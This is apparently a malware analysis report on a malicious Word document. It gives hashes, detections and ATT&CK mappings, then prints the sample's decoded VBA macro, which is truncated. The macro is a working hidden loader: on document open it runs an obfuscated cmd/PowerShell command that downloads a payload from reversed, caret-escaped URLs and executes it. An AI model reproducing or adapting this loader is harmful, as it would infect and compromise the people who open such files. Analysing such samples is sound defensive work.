Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b5c96ec8e22f52ae…

MALICIOUS

Office (OLE)

67.1 KB Created: 2018-09-06 09:56:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: d5bb2deefe749ff307ea260c1b6488c5 SHA-1: eeff8bac3ee2b327cce1b8349612bc6af2e68eea SHA-256: b5c96ec8e22f52ae3cbfcfe02ab1c8257ab7cdfb25c36a28bdff4032b9f803f5
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro that is triggered by the Document_open event. This macro uses the Shell() function to execute a command constructed from several concatenated strings, which likely downloads and executes a second-stage payload. The presence of the Shell() call and the Document_Open macro strongly indicate malicious intent.

Heuristics 5

  • ClamAV: Doc.Malware.Generic-6674221-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6674221-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5246 bytes
SHA-256: 1abf4ba9bc9a57d54d0d143dc3fb3b19f3aad3786166c23bdae0b96b48d39b0e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "FrYYzavB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Shell Format(wuaCIU) + UIwoOOkwXLkR + RwmzBqQhYIb + OOkjc + oqFMid + BFHRSJz + bJfimKBjlHu + vTcCrhiS, vbHide
End Sub



Attribute VB_Name = "dPITHRmjpNF"
Function OOkjc()

On _
Error _
Resume _
Next
Month "21987121" + "8273"
OkSGSfS = Chr(0 + 9 + 8 + 4 + 78) + "m" + "d" + " /V:^O" + "N/" + Chr(0 + 6 + 5 + 2 + 54) + Chr(0 + 2 + 2 + 1 + 29) + "^s^" + "e^t " + "j^s"
Month "HVtQMn" + "iaLRGtJr"
   Month "ECLzwaqHA" + "w"
   Month "NVwT" + "E" + "h" + "TEG"
   Month "X" + "rpGwpw" + "265407119" + "4106"
rVrjYjSb = "^h=" + " " + "^  " + "^  " + "^ ^ ^ "
Month "R" + "277001790" + "umB" + "L"
   Month "pnzD" + "fIv"
   Month "17478060" + "196649913"
   Month "Q" + "MilC" + "2908" + "250750224"
EEDkKr = "^  ^ " + " " + " ^" + "  ^ " + " ^" + "}}^{^h" + Chr(0 + 9 + 8 + 4 + 78) + "ta" + Chr(0 + 9 + 8 + 4 + 78) + "}^" + ";" + "kaer^b" + "^" + ";^SHn^" + "$ me^t^" + "I"
Month "CpJIfaBN" + "8997"
   Month "tH" + "452227383" + "2515" + "tuUD"
   Month "lbM" + "KAPj"
oOqjh = "-e" + "^k" + "ovn^I^" + ";)^S^" + "Hn^$^ " + ",E^" + "bK^$(e" + "^l^i^"
Month "8476" + "icAo"
   Month "kw" + "fJhLEHPGW"
   Month "zQXX" + "302" + "379991563" + "26525341"
   Month "116455349" + "2748139" + "419308881" + "66051211"
TwptHdTlXhL = "F^" + "d" + "aoln^w" + "^o^D^." + "^pR^U${" + "yrt" + "{)^Jja" + "^$^ n^i" + "^ ^Eb^K" + "^$" + "(^h" + Chr(0 + 9 + 8 + 4 + 78) + "^aer^of"
Month "9968" + "JnzzBQurwWD"
   Month "97156715" + "364273535"
RcIKj = "^;'^e" + "xe^" + ".'+vAz^" + "$+'^\^'" + "+" + Chr(0 + 9 + 8 + 4 + 78) + "i^l^b"
Month "6441" + "ij"
   Month "Ei" + "6878"
   Month "n" + "KsYj"
nzXzo = "^u^p^:" + "vne$=S" + "Hn^$^;" + "^'^" + "0^1" + "8" + "' ^"
Month "dEhGnRFMk" + "2755"
   Month "369541102" + "RMRwwCPFODiTNw"
   Month "Rp" + "c" + "FfiXBhlrHnL" + "rKDBTjFqQ"
   Month "dJjwbsLiuzq" + "jRih" + "Kjv" + "jRYsa"
   Month "XkwSNpfOT" + "o"
zhoYHw = "=^ vA^" + "z^" + "$^;" + ")^" + "'^@^'" + "(t^i^" + "lp" + "S" + ".^'3" + "^Q"
Month "1854" + "SpwAFIUai" + "2144" + "zI"
bjznJHhrkwO = "Hi9b" + "^4/m^o" + Chr(0 + 9 + 8 + 4 + 78) + "^.^" + "hkir^" + "ap" + "^dh" + "^" + "tr" + "a^m^as"
Month "shwtNrpETCIX" + "6899" + "9520" + "lwMDzWNv"
   Month "VjMLjl" + "136814733"
fYMKqW = "//^:pt^" + "th" + "^" + "@F^h" + "^tRT^p" + "D/m" + "^o" + Chr(0 + 9 + 8 + 4 + 78) + ".si" + "draped" + "^"
OOkjc = OkSGSfS + rVrjYjSb + EEDkKr + oOqjh + TwptHdTlXhL + RcIKj + nzXzo + zhoYHw + bjznJHhrkwO + fYMKqW
   Month "445178999" + "QI" + "hkou" + "789"
   Month "AGT" + "O"
End Function
Function oqFMid()

On _
Error _
Resume _
Next
Month "92507663" + "CiFwPukh"
   Month "813" + "l" + "365346307" + "cubjp"
   Month "t" + "396827134"
CrNFfWT = "ham/" + "/:^pt^t" + "h@B" + "^jtS/^m" + "^o" + Chr(0 + 9 + 8 + 4 + 78) + ".^oh" + "^g^-" + "nat//:^" + "p^tth@" + "M^a2^Xm" + "O^O/" + "^m"
Month "Iztbif" + "509609017"
HEjRnbXJzv = "o" + Chr(0 + 9 + 8 + 4 + 78) + "." + "el^as^y" + "tr^e" + "^por" + "^pay" + "na^l^a/" + "/^:^p^t" + "t^h^" + "@^" + "X^K^G"
Month "mUsm" + "337356236"
   Month "437880080" + "BN"
omttbbdWGni = "^Y/" + "^gro^." + "t" + "nem^p" + "^o" + "l" + "^eve^d" + "-^d^4" + "a//:^" + "p^tth'^" + "=Jja^$^"
Month "177375462" + "jIw"
FABsjz = ";^tn^e" + "^i" + "l" + Chr(0 + 6 + 5 + 2 + 54) + "^b" + "e^W." + "^t^eN ^" + "t" + Chr(0 + 9 + 8 + 4 + 78) + "^e^"
Month "330817982" + "jSl" + "48175834" + "634"
KoYGGClBi = "jbo^-we" + "n=^pR^" + "U^$^ " + "^ll" + "e^hs" + "r^ewo" + "^p&&f^o" + "r /" + "^" + "L %" + Chr(0 + 9 + 8 + 4 + 78) + " ^"
Month "iAzAVTFCwS" + "151120773"
   Month "HBoshaqh" + "j" + "508425340" + "9004129"
   Month "BsVzvkDnzjKmtH" + "uHzoON"
SldrCOTA = "in (" + "^" + "368^;^-" + "^1^" + ";^" + "0)^d" + "o ^s" + "e^"
oqFMid = CrNFfWT + HEjRnbXJzv 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.